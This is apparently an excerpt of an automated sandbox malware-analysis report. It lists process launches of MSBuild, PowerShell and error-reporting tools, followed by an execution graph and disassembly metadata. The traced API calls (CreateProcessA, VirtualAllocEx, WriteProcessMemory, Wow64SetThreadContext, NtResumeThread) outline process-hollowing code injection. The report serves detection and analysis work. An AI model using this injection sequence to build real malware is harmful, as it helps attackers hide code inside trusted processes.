                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff66e660000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:29
                          Start time:14:03:52
                          Start date:27/08/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Imagebase:0x2f0000
                          File size:262'432 bytes
                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:31
                          Start time:14:03:53
                          Start date:27/08/2024
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6452 -s 1064
                          Imagebase:0x800000
                          File size:483'680 bytes
                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:32
                          Start time:14:03:53
                          Start date:27/08/2024
                          Path:C:\Windows\System32\wermgr.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "6756" "2872" "2688" "2876" "0" "0" "2880" "0" "0" "0" "0" "0"
                          Imagebase:0x7ff799c70000
                          File size:229'728 bytes
                          MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:33
                          Start time:14:04:05
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                          Imagebase:0x7ff6e3d50000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:34
                          Start time:14:04:05
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff66e660000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:35
                          Start time:14:04:09
                          Start date:27/08/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Imagebase:0x8d0000
                          File size:262'432 bytes
                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:37
                          Start time:14:04:09
                          Start date:27/08/2024
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 1064
                          Imagebase:0x800000
                          File size:483'680 bytes
                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:38
                          Start time:14:04:09
                          Start date:27/08/2024
                          Path:C:\Windows\System32\wermgr.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "2548" "2816" "1512" "2820" "0" "0" "2824" "0" "0" "0" "0" "0"
                          Imagebase:0x7ff794bc0000
                          File size:229'728 bytes
                          MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:39
                          Start time:14:04:21
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                          Imagebase:0x7ff6e3d50000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:40
                          Start time:14:04:21
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff66e660000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:41
                          Start time:14:04:25
                          Start date:27/08/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                          Imagebase:0xb80000
                          File size:262'432 bytes
                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:43
                          Start time:14:04:25
                          Start date:27/08/2024
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2420 -s 1064
                          Imagebase:0x800000
                          File size:483'680 bytes
                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:44
                          Start time:14:04:26
                          Start date:27/08/2024
                          Path:C:\Windows\System32\wermgr.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "2744" "2812" "2240" "2816" "0" "0" "2820" "0" "0" "0" "0" "0"
                          Imagebase:0x7ff794bc0000
                          File size:229'728 bytes
                          MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:45
                          Start time:14:04:37
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                          Imagebase:0x7ff6e3d50000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:false

                          General

                          Target ID:46
                          Start time:14:04:37
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff66e660000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:false

                          General

                          Target ID:47
                          Start time:14:04:38
                          Start date:27/08/2024
                          Path:C:\Windows\System32\rundll32.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                          Imagebase:0x7ff7660b0000
                          File size:71'680 bytes
                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          General

                          Target ID:48
                          Start time:14:04:53
                          Start date:27/08/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                          Imagebase:0x7ff6e3d50000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:false

                          General

                          Target ID:49
                          Start time:14:04:53
                          Start date:27/08/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff66e660000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:false

                          General

                          Target ID:53
                          Start time:14:04:58
                          Start date:27/08/2024
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                          Imagebase:0x7ff7403e0000
                          File size:55'320 bytes
                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:false

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:10.4%
                            Dynamic/Decrypted Code Coverage:99%
                            Signature Coverage:14.4%
                            Total number of Nodes:299
                            Total number of Limit Nodes:24
                            execution_graph 56347 576d9b6 56348 576d9c0 56347->56348 56352 57f4cf1 56348->56352 56357 57f4d00 56348->56357 56349 576d9fe 56353 57f4d15 56352->56353 56362 57f4d33 56353->56362 56367 57f4d40 56353->56367 56354 57f4d2b 56354->56349 56358 57f4d15 56357->56358 56360 57f4d33 2 API calls 56358->56360 56361 57f4d40 2 API calls 56358->56361 56359 57f4d2b 56359->56349 56360->56359 56361->56359 56363 57f4d3a 56362->56363 56364 57f4f90 56363->56364 56372 57f8f28 56363->56372 56376 57f8f20 56363->56376 56364->56354 56368 57f4d6a 56367->56368 56369 57f4f90 56368->56369 56370 57f8f28 SleepEx 56368->56370 56371 57f8f20 SleepEx 56368->56371 56369->56354 56370->56368 56371->56368 56373 57f8f6c SleepEx 56372->56373 56375 57f8fcc 56373->56375 56375->56363 56377 57f8f6c SleepEx 56376->56377 56379 57f8fcc 56377->56379 56379->56363 56384 576e007 56385 576e011 56384->56385 56389 5818eb0 56385->56389 56398 5818ec0 56385->56398 56386 576d7c2 56390 5818ec0 56389->56390 56407 5818f00 56390->56407 56411 5818fcd 56390->56411 56415 5818fbd 56390->56415 56419 5819037 56390->56419 56423 5818f73 56390->56423 56427 5818ef0 56390->56427 56391 5818eeb 56391->56386 56399 5818ed5 56398->56399 56401 5818f00 12 API calls 56399->56401 56402 5818ef0 12 API calls 56399->56402 56403 5818f73 12 API calls 56399->56403 56404 5819037 12 API calls 56399->56404 56405 5818fbd 12 API calls 56399->56405 56406 5818fcd 12 API calls 56399->56406 56400 5818eeb 56400->56386 56401->56400 56402->56400 56403->56400 56404->56400 56405->56400 56406->56400 56410 5818f2a 56407->56410 56408 58191c6 56408->56391 56410->56408 56431 581a681 56410->56431 56413 5818f57 56411->56413 56412 58191c6 56412->56391 56413->56412 56414 581a681 12 API calls 56413->56414 56414->56413 56417 5818f57 56415->56417 56416 58191c6 56416->56391 56417->56415 56417->56416 56418 581a681 12 API calls 56417->56418 56418->56417 56421 5818f57 56419->56421 56420 58191c6 56420->56391 56421->56420 56422 581a681 12 API calls 56421->56422 56422->56421 56425 5818f57 56423->56425 56424 58191c6 56424->56391 56425->56424 56426 581a681 12 API calls 56425->56426 56426->56425 56428 5818f00 56427->56428 56429 58191c6 56428->56429 56430 581a681 12 API calls 56428->56430 56429->56391 56430->56428 56432 581a6a5 56431->56432 56435 581aa2d 56432->56435 56436 581aa2f 56435->56436 56440 581ae98 56436->56440 56455 581aea8 56436->56455 56437 581aa5a 56441 581aebd 56440->56441 56451 581aedf 56441->56451 56470 581bcea 56441->56470 56477 581b6c8 56441->56477 56483 581b428 56441->56483 56489 581b389 56441->56489 56495 581b8c3 56441->56495 56501 581b241 56441->56501 56505 581b9a1 56441->56505 56510 581b5df 56441->56510 56515 581bddd 56441->56515 56521 581bc5a 56441->56521 56526 581bbb0 56441->56526 56531 581b80a 56441->56531 56451->56437 56456 581aebd 56455->56456 56457 581aedf 56456->56457 56458 581b9a1 2 API calls 56456->56458 56459 581b241 2 API calls 56456->56459 56460 581b8c3 3 API calls 56456->56460 56461 581b389 2 API calls 56456->56461 56462 581b428 3 API calls 56456->56462 56463 581b6c8 3 API calls 56456->56463 56464 581bcea 3 API calls 56456->56464 56465 581b80a 3 API calls 56456->56465 56466 581bbb0 2 API calls 56456->56466 56467 581bc5a 2 API calls 56456->56467 56468 581bddd 3 API calls 56456->56468 56469 581b5df 2 API calls 56456->56469 56457->56437 56458->56457 56459->56457 56460->56457 56461->56457 56462->56457 56463->56457 56464->56457 56465->56457 56466->56457 56467->56457 56468->56457 56469->56457 56471 581b8c3 56470->56471 56472 581bd5d 56471->56472 56537 57fd68f 56471->56537 56541 57fd5a0 56471->56541 56545 57fd598 56471->56545 56472->56451 56473 581b904 56478 581b8e9 56477->56478 56480 57fd68f NtResumeThread 56478->56480 56481 57fd598 NtResumeThread 56478->56481 56482 57fd5a0 NtResumeThread 56478->56482 56479 581b904 56480->56479 56481->56479 56482->56479 56484 581b440 56483->56484 56549 57fd388 56484->56549 56553 57fd380 56484->56553 56557 57fd4d0 56484->56557 56485 581b483 56485->56451 56490 581b393 56489->56490 56491 581aff5 56490->56491 56561 581db49 56490->56561 56567 581db58 56490->56567 56492 581bc1e 56492->56451 56496 581b8cd 56495->56496 56498 57fd68f NtResumeThread 56496->56498 56499 57fd598 NtResumeThread 56496->56499 56500 57fd5a0 NtResumeThread 56496->56500 56497 581b904 56498->56497 56499->56497 56500->56497 56580 581dc81 56501->56580 56585 581dc90 56501->56585 56502 581b259 56506 581b9b9 56505->56506 56598 581c4b1 56506->56598 56602 581c4c0 56506->56602 56507 581aff5 56511 581bbd6 56510->56511 56513 581db49 2 API calls 56511->56513 56514 581db58 2 API calls 56511->56514 56512 581bc1e 56512->56451 56513->56512 56514->56512 56516 581bdf8 56515->56516 56518 57fd388 WriteProcessMemory 56516->56518 56519 57fd4d0 WriteProcessMemory 56516->56519 56520 57fd380 WriteProcessMemory 56516->56520 56517 581aff5 56518->56517 56519->56517 56520->56517 56522 581aff5 56521->56522 56523 581bd6d 56521->56523 56524 57fccc8 Wow64SetThreadContext 56523->56524 56525 57fccc0 Wow64SetThreadContext 56523->56525 56524->56522 56525->56522 56527 581bbba 56526->56527 56529 581db49 2 API calls 56527->56529 56530 581db58 2 API calls 56527->56530 56528 581bc1e 56528->56451 56529->56528 56530->56528 56532 581b829 56531->56532 56534 57fd388 WriteProcessMemory 56532->56534 56535 57fd4d0 WriteProcessMemory 56532->56535 56536 57fd380 WriteProcessMemory 56532->56536 56533 581aff5 56534->56533 56535->56533 56536->56533 56538 57fd616 NtResumeThread 56537->56538 56540 57fd693 56537->56540 56539 57fd640 56538->56539 56539->56473 56540->56473 56542 57fd5e9 NtResumeThread 56541->56542 56544 57fd640 56542->56544 56544->56473 56546 57fd5e9 NtResumeThread 56545->56546 56548 57fd640 56546->56548 56548->56473 56550 57fd3d4 WriteProcessMemory 56549->56550 56552 57fd46d 56550->56552 56552->56485 56554 57fd3d4 WriteProcessMemory 56553->56554 56556 57fd46d 56554->56556 56556->56485 56558 57fd456 WriteProcessMemory 56557->56558 56560 57fd4d3 56557->56560 56559 57fd46d 56558->56559 56559->56485 56560->56485 56562 581daf9 56561->56562 56563 581db56 56561->56563 56562->56492 56572 57fd228 56563->56572 56576 57fd220 56563->56576 56564 581db8f 56564->56492 56568 581db6d 56567->56568 56570 57fd228 VirtualAllocEx 56568->56570 56571 57fd220 VirtualAllocEx 56568->56571 56569 581db8f 56569->56492 56570->56569 56571->56569 56573 57fd26c VirtualAllocEx 56572->56573 56575 57fd2e4 56573->56575 56575->56564 56577 57fd228 VirtualAllocEx 56576->56577 56579 57fd2e4 56577->56579 56579->56564 56581 581dc90 56580->56581 56590 57fccc8 56581->56590 56594 57fccc0 56581->56594 56582 581dcbe 56582->56502 56586 581dca5 56585->56586 56588 57fccc8 Wow64SetThreadContext 56586->56588 56589 57fccc0 Wow64SetThreadContext 56586->56589 56587 581dcbe 56587->56502 56588->56587 56589->56587 56591 57fcd11 Wow64SetThreadContext 56590->56591 56593 57fcd89 56591->56593 56593->56582 56595 57fcd11 Wow64SetThreadContext 56594->56595 56597 57fcd89 56595->56597 56597->56582 56599 581c4d7 56598->56599 56600 581c4f9 56599->56600 56606 581cba5 56599->56606 56600->56507 56603 581c4d7 56602->56603 56604 581c4f9 56603->56604 56605 581cba5 2 API calls 56603->56605 56604->56507 56605->56604 56610 57fc904 56606->56610 56614 57fc910 56606->56614 56611 57fc910 CreateProcessA 56610->56611 56613 57fcb8c 56611->56613 56615 57fc990 CreateProcessA 56614->56615 56617 57fcb8c 56615->56617 56316 57fc1c8 56317 57fc14e 56316->56317 56318 57fc156 NtProtectVirtualMemory 56317->56318 56320 57fc1d3 56317->56320 56319 57fc16f 56318->56319 56380 580e658 56381 580e69c VirtualAlloc 56380->56381 56383 580e709 56381->56383 56321 576d8cc 56322 576d8d6 56321->56322 56326 57ff693 56322->56326 56330 57ff6a0 56322->56330 56323 576d7c2 56327 57ff6b5 56326->56327 56334 57ff843 56327->56334 56331 57ff6b5 56330->56331 56333 57ff843 2 API calls 56331->56333 56332 57ff6cb 56332->56323 56333->56332 56336 57ff865 56334->56336 56335 57ff6cb 56335->56323 56336->56335 56339 57fd878 56336->56339 56343 57fd873 56336->56343 56340 57fd8c1 VirtualProtect 56339->56340 56342 57fd92e 56340->56342 56342->56336 56344 57fd878 VirtualProtect 56343->56344 56346 57fd92e 56344->56346 56346->56336 56243 576e0db 56244 576e0e5 56243->56244 56248 58103c9 56244->56248 56257 58103d8 56244->56257 56245 576d7c2 56249 58103ed 56248->56249 56266 58105cd 56249->56266 56271 581093a 56249->56271 56276 58104bb 56249->56276 56281 5810418 56249->56281 56286 5810408 56249->56286 56291 5810910 56249->56291 56250 5810403 56250->56245 56258 58103ed 56257->56258 56260 5810910 2 API calls 56258->56260 56261 5810408 2 API calls 56258->56261 56262 5810418 2 API calls 56258->56262 56263 58104bb 2 API calls 56258->56263 56264 581093a 2 API calls 56258->56264 56265 58105cd 2 API calls 56258->56265 56259 5810403 56259->56245 56260->56259 56261->56259 56262->56259 56263->56259 56264->56259 56265->56259 56268 58105d3 56266->56268 56267 581089b 56267->56250 56268->56267 56269 57fd878 VirtualProtect 56268->56269 56270 57fd873 VirtualProtect 56268->56270 56269->56268 56270->56268 56272 5810497 56271->56272 56273 58104ac 56271->56273 56272->56273 56274 57fd878 VirtualProtect 56272->56274 56275 57fd873 VirtualProtect 56272->56275 56273->56250 56274->56272 56275->56272 56278 5810497 56276->56278 56277 58104ac 56277->56250 56278->56277 56279 57fd878 VirtualProtect 56278->56279 56280 57fd873 VirtualProtect 56278->56280 56279->56278 56280->56278 56283 5810445 56281->56283 56282 58104ac 56282->56250 56283->56282 56284 57fd878 VirtualProtect 56283->56284 56285 57fd873 VirtualProtect 56283->56285 56284->56283 56285->56283 56288 5810445 56286->56288 56287 58104ac 56287->56250 56288->56287 56289 57fd878 VirtualProtect 56288->56289 56290 57fd873 VirtualProtect 56288->56290 56289->56288 56290->56288 56293 5810497 56291->56293 56292 58104ac 56292->56250 56293->56292 56294 57fd878 VirtualProtect 56293->56294 56295 57fd873 VirtualProtect 56293->56295 56294->56293 56295->56293 56618 e1d01c 56619 e1d034 56618->56619 56620 e1d08f 56619->56620 56622 580db78 56619->56622 56623 580dbd1 56622->56623 56626 580e108 56623->56626 56624 580dc06 56627 580e135 56626->56627 56628 580e2cb 56627->56628 56629 580cf90 VirtualProtect 56627->56629 56628->56624 56630 580e2bc 56629->56630 56630->56624 56296 10657a8 56297 10657c5 56296->56297 56298 10657d5 56297->56298 56301 5802405 56297->56301 56304 5801099 56297->56304 56308 580cf90 56301->56308 56305 58010b8 56304->56305 56307 580cf90 VirtualProtect 56305->56307 56306 58001d5 56307->56306 56310 580cfb7 56308->56310 56312 580d490 56310->56312 56313 580d4d9 VirtualProtect 56312->56313 56315 580241d 56313->56315

                            Executed Functions

                            Function 057F9250 Relevance: 3.0, Strings: 2, Instructions: 542COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 370 57f9250-57f9271 371 57f9278-57f9310 call 57f9b83 370->371 372 57f9273 370->372 376 57f9316-57f934d 371->376 372->371 378 57f934f-57f935a 376->378 379 57f935c 376->379 380 57f9366-57f9438 378->380 379->380 389 57f944a-57f9475 380->389 390 57f943a-57f9440 380->390 391 57f9ae5-57f9b01 389->391 390->389 392 57f947a-57f95a3 391->392 393 57f9b07-57f9b22 391->393 402 57f95b5-57f9707 392->402 403 57f95a5-57f95ab 392->403 411 57f9709-57f970d 402->411 412 57f9760-57f9767 402->412 403->402 414 57f970f-57f9710 411->414 415 57f9715-57f975b 411->415 413 57f9912-57f992e 412->413 416 57f976c-57f985a 413->416 417 57f9934-57f9958 413->417 418 57f99a2-57f99f1 414->418 415->418 442 57f990e-57f990f 416->442 443 57f9860-57f990b 416->443 424 57f999f-57f99a0 417->424 425 57f995a-57f999c 417->425 432 57f9a03-57f9a4e 418->432 433 57f99f3-57f99f9 418->433 424->418 425->424 435 57f9ac7-57f9ae2 432->435 436 57f9a50-57f9ac6 432->436 433->432 435->391 436->435 442->413 443->442
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: 8$
                            • API String ID: 0-4207760960
                            • Opcode ID: b00e9186149e8d13382653a8df4b420e3330f3aeb8c4d80e38db1f953724a12a
                            • Instruction ID: 698b9fd2c28b48ce8f243a3751541184300e28c7122f37c616f9f52c221e5c87
                            • Opcode Fuzzy Hash: b00e9186149e8d13382653a8df4b420e3330f3aeb8c4d80e38db1f953724a12a
                            • Instruction Fuzzy Hash: CF42B071D016698BDB64DF69C850BD9B7B2BF89300F1486EAD50DA7351EB30AE81CF90
                            Function 057F9241 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 450 57f9241-57f9271 451 57f9278-57f9310 call 57f9b83 450->451 452 57f9273 450->452 456 57f9316-57f934d 451->456 452->451 458 57f934f-57f935a 456->458 459 57f935c 456->459 460 57f9366-57f9438 458->460 459->460 469 57f944a-57f9475 460->469 470 57f943a-57f9440 460->470 471 57f9ae5-57f9b01 469->471 470->469 472 57f947a-57f95a3 471->472 473 57f9b07-57f9b22 471->473 482 57f95b5-57f9707 472->482 483 57f95a5-57f95ab 472->483 491 57f9709-57f970d 482->491 492 57f9760-57f9767 482->492 483->482 494 57f970f-57f9710 491->494 495 57f9715-57f975b 491->495 493 57f9912-57f992e 492->493 496 57f976c-57f985a 493->496 497 57f9934-57f9958 493->497 498 57f99a2-57f99f1 494->498 495->498 522 57f990e-57f990f 496->522 523 57f9860-57f990b 496->523 504 57f999f-57f99a0 497->504 505 57f995a-57f999c 497->505 512 57f9a03-57f9a4e 498->512 513 57f99f3-57f99f9 498->513 504->498 505->504 515 57f9ac7-57f9ae2 512->515 516 57f9a50-57f9ac6 512->516 513->512 515->471 516->515 522->493 523->522
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: h$
                            • API String ID: 0-2188610404
                            • Opcode ID: 7a7791a0640ccf57b33a5dfc1761290421b2bb0d69b229bd4f2f52ccf70989c2
                            • Instruction ID: 48a7758ae1b7f02d2f3690e2409bd22b6e3f1b881b5bca1a439fcd6360d37959
                            • Opcode Fuzzy Hash: 7a7791a0640ccf57b33a5dfc1761290421b2bb0d69b229bd4f2f52ccf70989c2
                            • Instruction Fuzzy Hash: DB61C471D00629CBEB64DF6ACC50BD9BBB2BF89310F14C2AAD50DA7250EB305A85CF50
                            Function 057E0557 Relevance: 2.4, Strings: 1, Instructions: 1146COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4
                            • API String ID: 0-4088798008
                            • Opcode ID: 26376a416dd043a4b0fbf5a365a4b0a2fb1f6c3cc9001880f359124256c44699
                            • Instruction ID: b3b80f6ea2529686b86de309d40a45679b10e03e63c7e87abf13f1476f8331b8
                            • Opcode Fuzzy Hash: 26376a416dd043a4b0fbf5a365a4b0a2fb1f6c3cc9001880f359124256c44699
                            • Instruction Fuzzy Hash: 6CB2E634A00218CFDB14DFA4C998FADB7B6BB88710F158599E506AB3A5DBB0DC81DF50
                            Function 057E088F Relevance: 1.7, Strings: 1, Instructions: 495COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4
                            • API String ID: 0-4088798008
                            • Opcode ID: ecaa22cfd64268961f7b69ca1ff8483f93472aec60baad74814d47f4bad9c934
                            • Instruction ID: 453618cf597676a51f71f5fc4eeba1be08db54ce087579c7e6f9952e0fd23bcd
                            • Opcode Fuzzy Hash: ecaa22cfd64268961f7b69ca1ff8483f93472aec60baad74814d47f4bad9c934
                            • Instruction Fuzzy Hash: 0322E734A00219CFDB24DFA4C999BADB7B2FF48314F1481A9E509AB2A5DB70DD81DF50
                            Function 057FC0A0 Relevance: 1.6, APIs: 1, Instructions: 106nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1355 57fc0a0-57fc16d NtProtectVirtualMemory 1359 57fc16f-57fc175 1355->1359 1360 57fc176-57fc1c0 1355->1360 1359->1360
                            APIs
                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 057FC15D
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: MemoryProtectVirtual
                            • String ID:
                            • API String ID: 2706961497-0
                            • Opcode ID: a8c01e7781b9952f34f72bb115a29d7a4f88cc080e0c3e92b156aca47a34f2d2
                            • Instruction ID: b556a7ae22b411b7ed1a9aaa9c619199a6c979b45954585a546db1fab8439171
                            • Opcode Fuzzy Hash: a8c01e7781b9952f34f72bb115a29d7a4f88cc080e0c3e92b156aca47a34f2d2
                            • Instruction Fuzzy Hash: 1D4197B4D042589FDF10CFAAD880A9EFBB1BB49310F10942AE918B7300D735A902CF68
                            Function 057FC0A8 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1365 57fc0a8-57fc16d NtProtectVirtualMemory 1369 57fc16f-57fc175 1365->1369 1370 57fc176-57fc1c0 1365->1370 1369->1370
                            APIs
                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 057FC15D
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: MemoryProtectVirtual
                            • String ID:
                            • API String ID: 2706961497-0
                            • Opcode ID: cc112549b073c1443212cdc47ce3995352de0251bcaf0685a79d49f123cd0ac4
                            • Instruction ID: a3a1b0e36e6e53be726a7e5976403d7d5339b9fa6b0a797b0b59c9c0e9462123
                            • Opcode Fuzzy Hash: cc112549b073c1443212cdc47ce3995352de0251bcaf0685a79d49f123cd0ac4
                            • Instruction Fuzzy Hash: 6A4186B8D042589FDF10CFAAD980A9EFBB5BB49310F10942AE919B7300D735A905CF68
                            Function 057FD598 Relevance: 1.6, APIs: 1, Instructions: 83nativethreadCOMMON
                            Download Yara Rule
                            APIs
                            • NtResumeThread.NTDLL(?,?), ref: 057FD62E
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304247350.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57f0000_doc1.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
